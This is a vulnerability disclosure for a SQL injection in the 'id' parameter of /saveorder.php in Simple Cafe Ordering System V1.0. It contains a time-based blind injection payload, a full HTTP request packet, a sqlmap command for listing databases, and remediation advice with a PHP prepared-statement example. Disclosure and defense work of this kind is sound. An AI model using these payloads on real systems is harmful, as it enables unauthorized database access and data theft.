Code-projects Simple Cafe Ordering System V1.0 /saveorder.php SQL injection
NAME OF AFFECTED PRODUCT(S)
- Simple Cafe Ordering System
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
- huat
Vulnerable File
- /saveorder.php
VERSION(S)
- V1.0
Software Link
PROBLEM TYPE
Vulnerability Type
- SQL injection
Root Cause
- A SQL injection vulnerability was identified in the "/saveorder.php" file of the "Simple Cafe Ordering System" project. The root cause is that the value of the "id" parameter is used directly in SQL queries without proper sanitization or validation, so an attacker can supply crafted input values, manipulate the resulting SQL queries, and execute unauthorized operations.
Impact
- Exploiting this SQL injection vulnerability allows attackers to gain unauthorized access to the database, cause sensitive data leakage, tamper with data, gain complete control over the system, and even disrupt services. This poses a severe threat to both the security of the system and the continuity of business operations.
DESCRIPTION
- During the security assessment of "Simple Cafe Ordering System", I detected a critical SQL injection vulnerability in the "/saveorder.php" file. This vulnerability is attributed to the insufficient validation of user input for the "id" parameter. This inadequacy enables attackers to inject malicious SQL queries. Consequently, attackers can access the database without proper authorization, modify or delete data, and obtain sensitive information. Immediate corrective actions are essential to safeguard system security and uphold data integrity.
No login or authorization is required to exploit this vulnerability.
Vulnerability details and POC
Vulnerability location:
- "id" parameter
Payload:
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=33&transcode=0taoh8x3&name=Pizza&id=2' AND (SELECT 5949 FROM (SELECT(SLEEP(5)))VIjk) AND 'brjv'='brjv&price=30.00&name=Pizza&quantity=1&butadd.x=15&butadd.y=10
Vulnerability Request Packet
POST /CafeOrderingSystem_PHP/onlinecafe/saveorder.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 98
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/CafeOrderingSystem_PHP/onlinecafe/portal.php?id=2
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=jfkp5j84b961954sqhb22l7nn1
Connection: keep-alive
id=33&transcode=0taoh8x3&name=Pizza&id=2&price=30.00&name=Pizza&quantity=1&butadd.x=15&butadd.y=10
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
sqlmap -r vuln.txt --dbs
Suggested repair
- Employ prepared statements and parameter binding:
Prepared statements serve as an effective safeguard against SQL injection as they segregate SQL code from user input data. When using prepared statements, user-entered values are treated as mere data and will not be misconstrued as SQL code.
- Conduct input validation and filtering:
Rigorously validate and filter user input data to guarantee that it conforms to the expected format. This helps in blocking malicious input.
- Minimize database user permissions:
Ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day-to-day operations.
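The three repair points above, worked through for the "id" parameter as an added PHP example; this is not the project's own saveorder.php (whose query is not shown in this report), and the table name menu, the database name onlinecafe, the account cafe_app and the column names are assumptions.

```php
<?php
// Added example, not code from the Simple Cafe Ordering System project.
// Assumed schema: a table "menu" with integer primary key "id", "name", "price".

// Weak pattern (illustrative reconstruction of the class of bug described in
// the report, not the original file): the raw POST value is concatenated into
// the query text, so a quote in "id" lets the rest of the value be parsed as SQL.
function lookupItemUnsafe(mysqli $db, string $id): ?array
{
    $sql = "SELECT name, price FROM menu WHERE id = '" . $id . "'";
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// Hardened pattern: validate the parameter's type first, then bind it as data
// through a prepared statement so the server never parses it as SQL text.
function lookupItemSafe(PDO $db, mixed $rawId): ?array
{
    // 1. Input validation: "id" is a row identifier, so only a positive
    //    integer is acceptable; anything else is rejected before any query runs.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // 2. Prepared statement with parameter binding: "?" is a placeholder and the
    //    value travels separately from the query, typed as an integer.
    $stmt = $db->prepare('SELECT name, price FROM menu WHERE id = ?');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Least privilege: connect as an account that only holds the SELECT/INSERT
//    grants the ordering page needs (assumed account name; password is a placeholder).
$pdo = new PDO(
    'mysql:host=127.0.0.1;dbname=onlinecafe;charset=utf8mb4',
    'cafe_app',
    'REPLACE_WITH_REAL_PASSWORD',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // native server-side prepared statements
    ]
);

// PHP keeps the last occurrence of a repeated POST field, so "id=33&...&id=2"
// (as in the captured request) arrives here as "2".
$item = lookupItemSafe($pdo, $_POST['id'] ?? null);
```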